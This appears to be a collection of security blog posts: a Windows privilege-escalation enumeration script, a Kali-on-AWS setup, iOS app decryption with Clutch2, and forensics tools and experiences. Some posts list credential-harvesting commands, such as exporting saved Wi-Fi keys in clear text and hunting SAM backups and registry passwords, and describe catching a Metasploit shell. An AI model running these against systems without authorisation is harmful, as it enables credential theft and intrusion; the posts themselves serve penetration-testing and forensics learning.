A Script to Help Automate Windows Enumeration for Privilege Escalation

Often when I want to learn a skill, I’ll think up a project for myself that forces me to improve that skill. Recently I wanted to improve my Windows post exploitation and privilege escalation so I decided to work on a script to enumerate Windows systems to look for low hanging fruit that can be used to escalate privileges.

The definitive guide to Windows priv esc is http://www.fuzzysecurity.com/tutorials/16.html and a good deal of my commands come from that post or resources mentioned in the post. If you’re working on your Windows privilege escalation, you really should spend some time on that page.

I decided to use a batch file instead of PowerShell since batch should run anywhere and is easy for others to understand and modify. The output of the script is saved to three different text files. The script will be a work in progress, but I wanted to post a copy to try to help others automate the process.

First the script gathers basic enumeration information such as:

  • Hostname
  • Whoami
  • Username
  • net user info
  • syseminfo
  • mounted drives
  • path
  • tasklist /SVC

The script checks to see if .msi files are set to always install with elevated privlidges as well as for the presence of backup copies of the SAM for those juicy, juicy password hashes.

If accesschk.exe from sysinternals is present, the script uses it to check for services that can be modified by unprivileged users.

After a quick check for sysprep files which may contain creds, network information is gathered including

  • Ipconfig /all
  • Net use
  • Net share
  • Arp –a
  • Route print
  • Netstat –nao
  • Netsh firewall show state
  • Netsh firewall show config
  • Netsh wlan export profile key=clear (shows wifi networks and passwords that the system has connected to previously)

No privlidge escalation script would be complete without looking at scheduled tasks so we run

  • Schtasks /query /fo /LIST /v
  • Net start
  • driverquery

The script checks for any mention of “password” in the registry and then changes directories to c:\ . The reason for this change is it is getting ready to search the entire file system for files which may have credentials in them.

The results of the scans so far are saved to output.txt and a c:\temp directory is created for output of the next two text files of information.

The script checks for any file that contains “pass”, “cred”, “vnc” or “.config” in the file name. It then checks for a large number of .xml configuration files which may have creds including unattended install files.

The final file that the script creates is a tree list of all the files on the c:\ drive and the script ends by outputting any services which aren’t properly quotes and may be exploitable to the screen.

I recently had a chance to run this script and it GREATLY sped up the process of looking for low hanging fruit on a Windows system and helped me spot a password in the registry.

As I make modifications to the script I’ll post the updates here but you can download a copy of the script at: https://github.com/azmatt/windowsEnum

Python Script to Map Cell Tower Locations from an Android Device Report in Cellebrite

Recently Ed Michael showed me that Cellebrite now parses cell tower locations from several models of Android phones. He said that this information has been useful a few times but manually finding and mapping the cell tower locations by hand has been a pain in the butt. I figured that it should be easy enough to automate and Anaximander was born.

Anaximander consists of two python 2.7 scripts. One you only need to run once to dump the cell tower location information into a SQLite database and the second script you run each time to generate a Google Earth KML file with all of the cell tower locations on it. As an added bonus, the KML file also respects the timestamps in the file so modern versions of Google Earth will have a time slider bar across the top to let you create animated movies or only view results between a specific start and end time.

Step one is to acquire the cell tower location. For this we go to http://opencellid.org/ and sign up for a free API. Once we get the API key (instantly) we can download the latest repository of cell phone towers.


Currently the tower data is around 2.2 GB and contained in a CSV file. Once that file downloads you can unzip it to a directory and run the dbFill.py script from Anaximander. The short and simple script creates a SQLite database named “cellTowers.sqlite” and inserts all of the records into that database. The process should take 3-4 minutes and the resulting database will be around 2.6 GB.

Once the database is populated, the next time you dump an Android device with Cellebrite and it extracts the cell towers from the phone, you’ll be ready to generate a map.

From The “Cell Towers” section of your Cellebrite results, export the results in “XML”. Place that xml file and the Anaximander.py file in the same directory as your cellTowers.sqlite database and then run Anaximander.py –t <YourCellebriteExport.xml> . The script will start parsing through the XML file to extract cell towers and query the SQLite database for the location of the tower. Due to the size of the database the queries can take a second or two each so the script can take a while to run if the report contains a large number of towers.


Ed was kind enough to provide two reports from different Android devices and both parsed with no issues. Once the script is finished it will let you know how many records it parsed and that it generated a KML file.


This is what the end results look like.


The script can be downloaded from: https://github.com/azmatt/Anaximander

This is the first version and there are several improvements to make but I wanted to get a working script out to the community to alleviate the need for examiners to map the towers one at a time. Special thanks again to Ed Michael for the idea for this (and one other) script as well as for providing test data to validate the script.

How to Guide for Getting Kali Linux Set Up on an AWS Instance

I’ve been using a “jump box” on Digital Ocean for a few years now and recently decided that I wanted to set up a Kali Linux instance on AWS. I ran into a few hiccups getting it up and running, so I documented what worked for me here in the hopes of saving others time and headaches.

One of the first articles I came across was by primal security (whose podcast I absolutely LOVE) at http://www.primalsecurity.net/pentesting-in-the-cloud/ . There was some great stuff in this article. Unfortunately it relied on an AWS marketplace Kali Linux image, which is no longer available to new customers.

The next article I found was at http://sneakerhax.com/kali-linux-in-the-ec2-cloud/ . It was very close to what I needed, with a few exceptions, including: the default install for the Debian Jessie instance at the link they provided had a default main partition drive size of only 8GB, which was not enough for a full Kali Linux install. I learned that lesson the hard way when my install failed at the very end.

With a hat tip to the above resources, here are the steps needed to successfully install Kali Linux on AWS.

Go into your AWS console and select, “Launch Instance,” in the upper left hand corner.


Search for and select the Debian Jessie image from the AWS Marketplace.


Here you can select how many vCPUs and RAM you would like. (Admin note: I chose the medium with 2 CPUs and 4 GBs of RAM.) Make sure you hit the, “Next: Configure Instance Details,” so you can add more storage space.

The defaults on most pages should work fine for you, so click Next until get to the, “Step 4: Add Storage,” page. On this page, make sure you change the default size from 8 to at least 20 GBs. (Admin note: I went with 30 GBs.) After an install of Kali Linux Full, the drive will have around 10 GBs on it, so anything over 20 should be good for you.


Once you make that change, you are ready to launch your instance and SSH in. If you’ve never used AWS before, it may take you a few minutes to figure out how to access your box. After the first time, it’s quite easy. Make sure your security groups allow for SSH from your current IP address. The private key you generate should allow you to SSH onto the box – as the user “admin” – using just that key file for authentication.

Click the connect button in your AWS control panel instance window, and you will see some tips on how to access your box, including how to modify the key file for Putty, if you’re a Windows user.

Once you’re logged into the box, run sudo su in order to switch to the root user. Use the passwd command to create a password for root.

Next, add the Kali Linux source repositories. Typing vi /etc/apt/sources.list will let you access the sources.list file where you can then append the following lines onto the end.

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali sana main non-free contrib
# deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

deb http://old.kali.org/kali moto main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali moto main non-free contrib

Admin note: The source for these repositories is from the official kali site at http://docs.kali.org/general-use/kali-linux-sources-list-repositories

Once the repositories are in place, run apt-get update && apt-cache search kali-linux to get update information and show all of your Kali Linux install options.

Once that command is complete, you will see a list of about ten different flavors of Kali Linux available, including: minimal, top ten, and full. Of course, you want the full version (which is what you have in a normal Kali Linux VM) so run apt-get install kali-linux-full . This will likely take a while to run, but once it completed (hopefully without errors) you’ll have a working Kali Linux distro in the AWS cloud.

Admin note: There is a very real chance that you could encounter errors in these steps. If this happens, it’s no big deal. Ensure you added the correct lines to the sources.list file and then just rerun the last two apt-get commands. It may take an iteration or two, but it will eventually work and install successfully.

What better way is there to test a newly installed Kali instance than to type msfconsole ?


I tested my new instances connectivity by grabbing the public facing IP from the AWS control panel, opening up port 80 and hitting it from a web browser. That worked, but was boring. What was quite a bit more fun was firing up a Metasploit listener, putting the IP address into a Lan Turtle from Hak5, sticking that in a computer hooked up to a network and within a few seconds receiving a shell.


You now have a fully updated machine running Kali Linux sitting on the internet ready to go anytime you want it, for a total cost of a few dollars a month, as long as you remember to shut it down after you use it!

I can’t wait to collect more shells!

GREM Achievement Unlocked

I had been going through the SANS FOR610 Reverse Engineering Malware content OnDemand recently and last week I knocked out the GREM. I figured it would be a good time to post a few thoughts on it and talk about a few things that people can do to help prep for the course.

This was the first time in a while where I prepped for a GIAC exam without attending the course live. I was a bit worried about that with such a technical course but I ended up having a great experience. This was also the first time one of my courses has had the new style of OnDemand where the course was recorded in a professional studio instead of during a live class. The results were really nice and felt for intimate than I expected.

Every time a lab came up I would pause the course, work through the lab and then watch Lenny Zeltser’s walkthrough afterwards. He did a fantastic job of explaining things and going through the labs step by step. Even with dealing with advanced concepts, I never felt lost.

In a stroke of great timing, when I was about 75% through the course content I got a spear fishing email at work with an attachment. I checked it against virustotal.com and only 4/56 flagged it as malicious and there was no further information. I thought it would be a good chance to put my newly found skills to the test and examine the attachment. I fired up my two VMs and in a short amount of time I had a clear picture on what the malware was doing, had network based and host based IOCs and was walking through the code in a debugger examining how it was unpacking itself. It was great practice and a nice confirmation that what I had learned worked in the real world.

In prepping for the exam I had spoken to several friends who held the GREM certification. One of the biggest things someone can do to help prepare for the course is to get comfortable with assembly language and being able to watch/understand what the stack is doing within a debugger. The course teaches these things but if you’ve already been exposed to them you’ll feel a lot more comfortable and it will allow you to focus on learning other material.

Different people have different learning styles but this is one area where I think it’s really beneficial to watch someone walking through examples while they explain what’s going on. A fantastic free resource for getting exposed to Assembly Language is Vivek Ramachandran’s “Assembly Language Megaprimer for Linux” 11 part video series at SecurityTube.net (http://www.securitytube.net/groups?operation=view&groupId=5) or on YouTube (https://www.youtube.com/watch?v=K0g-twyhmQ4&list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR). Vivek also has a cheap but not free “x86 Assembly Language and Shellcoding on Linux” series at PentesterAcademy.com which really helped me prepare for working on both Reverse Engineering and Exploit Development.

Overall I thought the FOR610 was a fantastic course and I got exactly what I wanted to get out of it.

How Long Do Truecrypt AES Keys Remain In Memory?

It’s been a bit since my last post and in that time I’ve been to two SANS conferences, Blackhat and Defcon. It’s been a great but busy few months.

A few weeks ago I was presenting at a local forensics meeting and was asked by an attendee if AES keys from Truecrypt remained in memory when the Truecrypt volume was dismounted. I replied that I was fairly certain they were flushed from memory when the volume was dismounted but that I hadn’t tested it. It’s a fairly simple thing to test so I made a mental note to test it when I had a chance.

I fired up a laptop running Truecrypt 7.2 on Windows 7. I used the new Magnet Forensics memory acquisition tool and acquired the memory on the laptop. I then mounted a Truecrypt volume on the laptop and then took a second memory image. Finally I dismounted the Truecrypt volume and immediately acquired the memory for a third time.

Obviously the first memory image didn’t have any Truecrypt AES keys since I hadn’t mounted the volume yet.

In the second memory image I used the Volatility “truecryptmaster” command to locate and display the Truecrypt AES key.


Finally for the big test I examined the third memory image which I acquired right after I dismounted the Truecrypt volume.


It appears as though the Truecrypt AES keys are indeed flushed from memory as soon as the volume is dismounted. I wanted to verify my findings using a different tool so I fired up Bulk Extractor and ran it on all three memory images. As you can see in the screenshot below the Truecrypt AES master key shown in the second Volatility examination is seen in the second memory image but not in the first or the third.


This was a quick and simple experiment to verify what we thought was happening was actually happening.

A Quick Guide to Using Clutch 2.0 to Decrypt iOS Apps

A few days ago someone told me that they weren’t able to install Crackulous on their jailbroken iOS device and asked if I could recommend an alternative they could use to decrypt iOS apps. Since Crackulous was a GUI frontend for Clutch I recommended that they check out Clutch but when I went to find a good tutorial I could only find ones showing older versions of Clutch instead of the newer Clutch 2.0 RC2. It’s not quite as friendly as the older versions of Clutch but it works like a champ on my jailbroken iPhone 5S running 8.1.2.

The easiest way to get Clutch 2.0 RC2 on your jailbroken device is to add the iPhoneCake repository to cydia using the URL http://cydia.iphonecake.com . Once that repository is added you should be able to install Clutch 2.0 as show in the image below.


Another option is downloading the sourcecode from the Clutch github repository at https://github.com/KJCracks/Clutch and compile it using Xcode with iOSOpenDev installed. Once Clutch2 was on my iOS device I used Putty to connect to it via SSH from my Windows system. I also could have used a terminal app on the iPhone itself and elevated my privileges to root.




Once I was connected I typed “Clutch2” which showed the following options:


Typing “Clutch2 –i” displayed all of the app store apps installed on the device:



I decided to dump the third application (which I don’t want to display since I didn’t write the app) so I ran “Clutch2 –b <BundleID#>”. If I had wanted to dump the second app (WordPress) I would have typed “Clutch2 –b org.wordpress”. Clutch2 quickly generated the following output:



The decrypted binary was placed under the /var/tmp/clutch directory. I used ifunbox to copy both the decrypted binary and the original binary (located in /var/mobile/Containers/Bundle/Application/xxxx) to my computer so I could compare the before and after results. Normally Mach-O executable files contain code for multiple arm architectures and you need to use the OSX command line tool “lipo” to extract the arm version that you would like to analyze but in this case the application only contained code for armv7 so that wasn’t necessary.

Below you can see where I ran file on an iOS app with multiple architectures (armv7s and armv7) and file on this application which only has one architecture.










Once I confirmed that I wasn’t dealing with multiple architectures I used the strings command to extract the txt from both the original binary and the binary which Clutch2 produced. The original encrypted version is on the left and the post Clutch2 decrypted version is on the right.










As you can see the decrypted version gives us quite a bit more information about what’s going on inside of the application and I can start to use the tricks I learned in the SANS SEC575 course to analyze the app and it’s behavior.

New Video Preview Utility to Help With Forensics Analysis

videoPreviewUtilityReportEarlier this week I walked into a friend’s office and he had just finished examining an iPhone using Cellebrite. The good news is that the acquisition went flawlessly. The bad news was that the device contained over 200 videos that he now needed to preview to see if any were relevant to his interests. As phones grow larger and larger (I have my 128GB iPhone sitting next to me as I type this) this is only going to become a bigger issue so I wanted to write a python script to try to help in situations like these.

The Video Preview Utility (for lack of a better name) utilizes the “Video Thumbnails Maker” tool to generate a sheet of evenly space thumbnail preview images for all video files in a directory. It copies all of those images to a subdirectory, creates an HTML file with all of the preview images and generates a log of all videos successfully processed and any videos where an error occurred. It’s a heck of a lot quicker to scroll down a HTML page looking for anything of interest than it is to click around in hundreds of videos.

Note: These instructions cover Windows and assume Python 2.7.x is installed. No third party libraries were used.

Step 1 is to download and install Video Thumbnails Maker from http://www.suu-design.com/downloads.html. As I write this it’s the third program from the top on that page.

Step 2 is to add the directory where it installs to into your system’s path. The directory where it installed on my laptop was “C:\Users\Matt\AppData\Local\Video Thumbnails Maker”. Once you add it to your path and restart your machine it should be setup but you can check by opening up a command prompt and typing “VideoThumbnailsMaker.exe”. If the program starts then it’s in your path and our script will be able to find it no matter which directory you run it from.

Step 3 is to start Video Thumbnails Maker (this is the only time we will use it graphically), click on “environment” and deselect the “VTX (Video Thumbnails File)” Box. Leaving it selected wouldn’t hurt anything but it would place VTX files into your videos directory which aren’t needed.





Once these steps are done you should be ready to run the script. Download videoPreviewUtility.py, unzip it, place it into a directory with your video files and run it. It will create a subdirectory with a name of the current date and time. It will then attempt to generate a video preview image for every .mov, .mp4, .avi and .wmv file in the directory. Adding additional file types or extension names should be as easy as adding another OR option on what is currently line number 24. As mentioned earlier, in addition to the preview images themselves it also generates an HTML report with all of the video previews and a log file with all successfully previewed videos and any which weren’t able to be previewed.

I’ll give this script some more testing with different types of dumps next week and will likely tweak it some but I wanted to get it up for anyone to play with. Friends don’t let friends watch 200+ videos!!!

Long Overdue 2015 Update

cc15badgeIt’s been an extremely busy start to the year but I wanted to make a quick post to talk about what I’ve been up to so far.

Last month I got to attend my first SANS DFIR specific event when I took the FOR508 with Rob Lee in Monterey. I’ve taken the 508 previously but this was a much needed refresher. As I’ve discussed in a few different articles the FOR408 focuses on analyzing activity on a Windows computer and the 508 builds upon that base to cover quickly triaging large numbers of systems remotely, a “greatest hits” of memory analysis, timeline automation and analysis, volume shadow copy analysis and covers deep dive artifact analysis on Windows systems like I’ve never seen covered anywhere else. The deep dive section may be things you don’t remember verbatim but the combination of being exposed to them and having the course books as a reference means you’ll quickly be able to analyze those artifacts when the time comes.

In addition to being my first DFIR specific conference, this was my first class with Rob Lee. He was funny, friendly and took the time to chat with students in class and online. Throughout the entire class Rob shared real world stories of exactly how what he was teaching us has been used out in the real world.

For the day 6 challenge Rob and the 572 instructor Phil Hagen tried something they had never tried before, they combined the classes! The data for the day six challenge for both classes is from the same event (508 students have the disk and memory artifacts and 572 students have the network artifacts) so their idea was that teams could work together with 508 students giving 572 students indicators to look for and 572 students helping answer what activity was going on. The plan worked flawlessly and everyone involved seemed to have a really good time. I was fortunate to have some brilliant individuals on my team and we won the challenge and the Lethal Forensicator coins 🙂

Monterey was a great time but as soon as I got back home it was back to the books. Back in December I answered the CactusCon call for papers with a proposal for my first ever public con talk. CactusCon called my bluff so this past Friday I gave a talk on “Getting Started with Memory Forensics”. There were approximately 40 people in the room for my talk and I received some great feedback afterwards. This was my first CactusCon and they did a fantastic job from start to finish. They had multiple tracks of talks, a Dave Kennedy keynote speech, a lockpick village and an area outside for attendees to solder the parts kits onto their badges. I had a great time and I’ve got nine months to come up with a good idea for a talk for the 2016 version.

That’s what’s been keeping me occupied so far this year. I’d say that now I can breathe a little but I doubt very seriously that it’s going to slow down.

2015 is Upon Us

I planned on doing a few blog posts in December but due to a few great December surprises I wasn’t online much. My month started off by taking a much needed relaxing week of vacation in San Diego with my wife. On the last day of our trip I got the type of email everyone hopes for: “I know this is last minute, but would you like to go to the SANS CDI conference in DC next week?”.

CDI was my first east coast SANS conference and it was well worth the trip. I got to spend a lot of time with some absolutely amazing people and it was truly one of the best weeks of my life. I’m not sure yet what conferences I’ll be going to in 2015 but I can’t wait to find out.

It was a great end to a fantastic year. I got the opportunity to attend several SANS trainings in person as well as online. Got a chance to attend some other penetration testing training. Got to attend my first Blackhat and Defcon thanks to the generosity of Don over at ethicalhacker.net and made some great friends with similar interests to mine.

I improved my knowledge and skills dramatically in 2014 but still have a lot of work to do in some areas including exploit development and reverse engineering. I’m also starting to play with things like using binwalk to analyze firmware and I just got a Riff Box to try to learn to JTAG mobile devices.

Thank you so much to everyone I’ve interacted with this year and hopefully 2015 will be even better.

New Network Forensics Challenge

Recently on the SANS DFIR mailing list one of the members announced he had put together a Network Forensics challenge for anyone who wanted to participate. The challenge is at http://blog.mywarwithentropy.com/2014/11/spy-hunter-holiday-challenge-2014.html where you can download a large pcap and a PDF with instructions.

I’ve only had a small amount of time to play with the pcap but it’s very well done and I’m looking forward to digging deeper into it.